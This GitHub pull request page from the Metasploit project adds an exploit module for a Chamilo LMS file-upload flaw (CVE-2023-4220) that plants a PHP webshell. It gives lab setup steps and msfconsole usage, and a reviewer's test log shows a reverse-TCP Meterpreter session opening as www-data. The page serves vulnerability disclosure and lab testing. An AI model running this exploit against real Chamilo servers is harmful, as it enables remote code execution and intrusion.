Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Chamilo v1.11.24 Unrestricted File Upload (CVE-2023-4220) #19629

Merged
merged 3 commits into from
Dec 4, 2024
Merged

Chamilo v1.11.24 Unrestricted File Upload (CVE-2023-4220) #19629

merged 3 commits into from
Dec 4, 2024

Conversation

jheysel-r7
Copy link
Contributor

@jheysel-r7 jheysel-r7 commented Nov 11, 2024
edited
Loading

Chamilo LMS is a free software e-learning and content management system. In versions prior to <= v1.11.24 a webshell can be uploaded via the bigload.php endpoint. If the GET request parameter action is set to post-unsupported file extension checks are skipped allowing for attacker controlled .php files to be uploaded to: /main/inc/lib/javascript/bigupload/files/ if the /files/ directory already exists - it does not exist by default.

Setup

A vulnerable docker-compose configuration can be found at the following link: vulhub/vulhub#559

  1. Clone the repo git clone https://github.com/vulhub/vulhub.git
  2. Checkout the pull request mentioned above: git checkout CVE-2023-4220
  3. Run cd vulhub/chamilo/CVE-2023-4220
  4. Start the environment: docker compose up
  5. Navigate to http://127.0.0.1:8080 to complete the installation wizard.
  6. Note when filling out the database IP address and credentials - the DB hostname is the name of the container which is
    mariadb (not localhost or 127.0.0.1).
  7. Once the installation wizard is complete the target should be ready to be
    exploited with the module. This container has the non-default /files/ directory created already.

Verification

List the steps needed to make sure this thing works

  1. Start msfconsole
  2. Do: use linux/http/chamilo_bigupload_webshell
  3. Set the RHOST, RPORT, and LHOST options
  4. Run the module
  5. Receive a Meterpreter session as the www-data user.

@adfoster-r7 adfoster-r7 self-assigned this Nov 11, 2024
@jheysel-r7 jheysel-r7 changed the title CVE-2023:4220: Chamilo v1.11.24 Unrestricted File Upload Chamilo v1.11.24 Unrestricted File Upload (CVE-2023:4220) Nov 11, 2024
@jheysel-r7 jheysel-r7 changed the title Chamilo v1.11.24 Unrestricted File Upload (CVE-2023:4220) Chamilo v1.11.24 Unrestricted File Upload (CVE-2023-4220) Nov 12, 2024
@jheysel-r7 jheysel-r7 linked an issue Nov 12, 2024 that may be closed by this pull request
Chamilo v1.11.24 Unrestricted File Upload PHP Webshell #19631
Closed
@adfoster-r7 adfoster-r7 removed their assignment Nov 12, 2024
@jheysel-r7 jheysel-r7 added the rn-modules release notes for new or majorly enhanced modules label Nov 25, 2024
@dledda-r7 dledda-r7 self-assigned this Dec 2, 2024
dledda-r7
dledda-r7 approved these changes Dec 4, 2024
View reviewed changes
Copy link
Contributor

@dledda-r7 dledda-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Looks good!

msf6 exploit(linux/http/chamilo_bigupload_webshell) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 exploit(linux/http/chamilo_bigupload_webshell) > set rport 8080
rport => 8080
msf6 exploit(linux/http/chamilo_bigupload_webshell) > exploit

[*] Started reverse TCP handler on 172.21.111.143:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The directory /main/inc/lib/javascript/bigupload/files/ exists on the target indicating the target is vulnerable.
[+] The target is vulnerable. File upload was successful (CVE-2024-4220 was exploited successfully).
[*] Sending stage (40004 bytes) to 172.18.0.3
[+] Deleted D73uPl0z
[+] Deleted DEyYYuoivfzUFvHx.php
[*] Meterpreter session 1 opened (172.21.111.143:4444 -> 172.18.0.3:48560) at 2024-12-04 07:50:01 -0500


meterpreter > 
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : 345de2434c3a
OS          : Linux 345de2434c3a 6.11.2-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.11.2-1kali1 (2024-10-15) x86_64
Meterpreter : php/linux
meterpreter > ls
No entries exist in /var/www/chamilo/main/inc/lib/javascript/bigupload/files
meterpreter >

@dledda-r7 dledda-r7 merged commit ab2ca41 into rapid7:master Dec 4, 2024
38 checks passed
@dledda-r7
Copy link
Contributor

dledda-r7 commented Dec 4, 2024
edited
Loading

Release Notes

This adds an exploit module for Chamilo LMS, where versions prior to <= v1.11.24, a webshell can be uploaded via the bigload.php endpoint allowing remote code execution on the context of www-data (CVE-2023-4220).

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@smcintyre-r7 smcintyre-r7 smcintyre-r7 left review comments

@dledda-r7 dledda-r7 dledda-r7 approved these changes

Assignees

@dledda-r7 dledda-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

Chamilo v1.11.24 Unrestricted File Upload PHP Webshell
4 participants
@jheysel-r7 @dledda-r7 @smcintyre-r7 @adfoster-r7